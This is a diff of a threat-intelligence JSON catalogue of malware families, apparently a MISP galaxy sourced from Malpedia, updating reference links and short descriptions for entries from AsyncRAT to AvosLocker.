+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
+ "https://twitter.com/vxunderground/status/1519632014361640960",
+ "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/",
+ "https://twitter.com/ESETresearch/status/1449132020613922828",
+ "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
"https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html",
- "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://community.riskiq.com/article/24759ad2",
"https://www.esentire.com/blog/asyncrat-activity",
- "https://aidenmitchell.ca/asyncrat-via-vbs/",
- "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
- "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://twitter.com/vxunderground/status/1519632014361640960",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/",
- "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://eln0ty.github.io/malware%20analysis/asyncRAT/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper",
+ "https://aidenmitchell.ca/asyncrat-via-vbs/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://community.riskiq.com/article/3929ede0/description",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
"https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf",
- "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/"
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://community.riskiq.com/article/ade260c6",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader",
+ "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
],
"synonyms": [],
"type": []
@@ -12812,9 +13618,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch",
- "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
+ "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/",
"https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
- "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/"
+ "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/"
],
"synonyms": [],
"type": []
@@ -12827,8 +13633,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere",
- "https://www.group-ib.com/resources/threat-research/silence.html",
- "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/"
+ "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/",
+ "https://www.group-ib.com/resources/threat-research/silence.html"
],
"synonyms": [],
"type": []
@@ -12841,9 +13647,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter",
+ "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf"
],
"synonyms": [],
@@ -12858,14 +13664,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo",
"https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/",
"https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
- "https://twitter.com/siri_urz/status/1437664046556274694?s=20",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
"https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/",
+ "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://twitter.com/siri_urz/status/1437664046556274694?s=20"
],
"synonyms": [],
"type": []
@@ -12878,11 +13684,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.attor",
- "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
"https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/",
+ "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html",
+ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami",
"https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform",
- "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
"https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/",
"https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/"
],
@@ -12906,6 +13714,21 @@
"uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
"value": "August Stealer"
},
+ {
+ "description": "According to Sophos, the AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill",
+ "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
+ ],
+ "synonyms": [
+ "SophosKill"
+ ],
+ "type": []
+ },
+ "uuid": "07bd266b-811a-4abe-83b3-471918d6fab4",
+ "value": "AuKill"
+ },
{
"description": "",
"meta": {
@@ -12918,15 +13741,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "316c87d4-4404-42ab-9887-f9e321aed93c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
"value": "Auriga"
},
@@ -12935,71 +13749,83 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora",
- "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/",
"https://twitter.com/malwrhunterteam/status/1001461507513880576",
- "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/"
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://blog.morphisec.com/in2al5d-p3in4er"
],
"synonyms": [
"OneKeyLocker"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "70c31066-237a-11e8-8eff-37ef1ad0c703",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d",
"value": "Aurora"
},
+ {
+ "description": "First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets, local systems, and act as a loader. During execution, the malware runs several commands through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server within a single base64-encoded JSON file.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer",
+ "https://d01a.github.io/aurora-stealer/",
+ "https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/",
+ "https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html",
+ "https://d01a.github.io/aurora-stealer-builder/",
+ "https://isc.sans.edu/diary/rss/29448",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/",
+ "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ac697773-7239-4f01-b4b3-7da8b2a64bdf",
+ "value": "Aurora Stealer"
+ },
{
"description": "Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
- "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.connectwise.com/resources/avaddon-profile",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://twitter.com/Securityinbits/status/1271065316903120902",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted",
+ "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
"https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/",
"https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/",
+ "https://twitter.com/dk_samper/status/1348560784285167617",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.swascan.com/it/avaddon-ransomware/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://arxiv.org/pdf/2102.04796.pdf",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
+ "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis",
"https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire",
- "https://www.swascan.com/it/avaddon-ransomware/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/",
- "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/",
- "https://www.connectwise.com/resources/avaddon-profile",
- "https://twitter.com/dk_samper/status/1348560784285167617",
- "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://arxiv.org/pdf/2102.04796.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://twitter.com/Securityinbits/status/1271065316903120902",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/"
+ "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf"
],
"synonyms": [],
"type": []
@@ -13021,10 +13847,11 @@
"value": "AvastDisabler"
},
{
- "description": "",
+ "description": "Bleeping Computer notes about discovery of AVCrypt, a malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, as it removes numerous services, including Windows Update, and provides no contact information, this ransomware may be a wiper.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt",
+ "https://twitter.com/malwrhunterteam/status/976925447043846145",
"https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/"
],
"synonyms": [],
@@ -13065,41 +13892,50 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
- "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery",
- "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA",
- "https://reaqta.com/2019/04/ave_maria-malware-part1/",
- "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
- "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
+ "https://www.youtube.com/watch?v=81fdvmGmRvM",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
"https://www.youtube.com/watch?v=T0tdj1WDioM",
"https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
- "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.youtube.com/watch?v=-G82xh9m4hc",
- "https://blog.yoroi.company/research/the-ave_maria-malware/",
- "https://asec.ahnlab.com/en/36629/",
- "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
- "https://www.youtube.com/watch?v=81fdvmGmRvM",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies",
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.youtube.com/watch?v=-G82xh9m4hc",
+ "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing",
+ "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
+ "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
+ "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://reaqta.com/2019/04/ave_maria-malware-part1/",
"https://blog.morphisec.com/syk-crypter-discord",
- "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
- "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
+ "https://blog.yoroi.company/research/the-ave_maria-malware/",
+ "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/",
+ "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
+ "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA",
+ "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/",
"https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/"
+ "https://asec.ahnlab.com/en/36629/",
+ "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
+ "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf"
],
"synonyms": [
"AVE_MARIA",
@@ -13114,26 +13950,26 @@
"value": "Ave Maria"
},
{
- "description": "",
+ "description": "AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.\r\n\r\nIn March 2022, the FBI and US Treasury Department issued a warning about the attacks.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.ic3.gov/Media/News/2022/220318.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
"https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/",
- "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
"https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
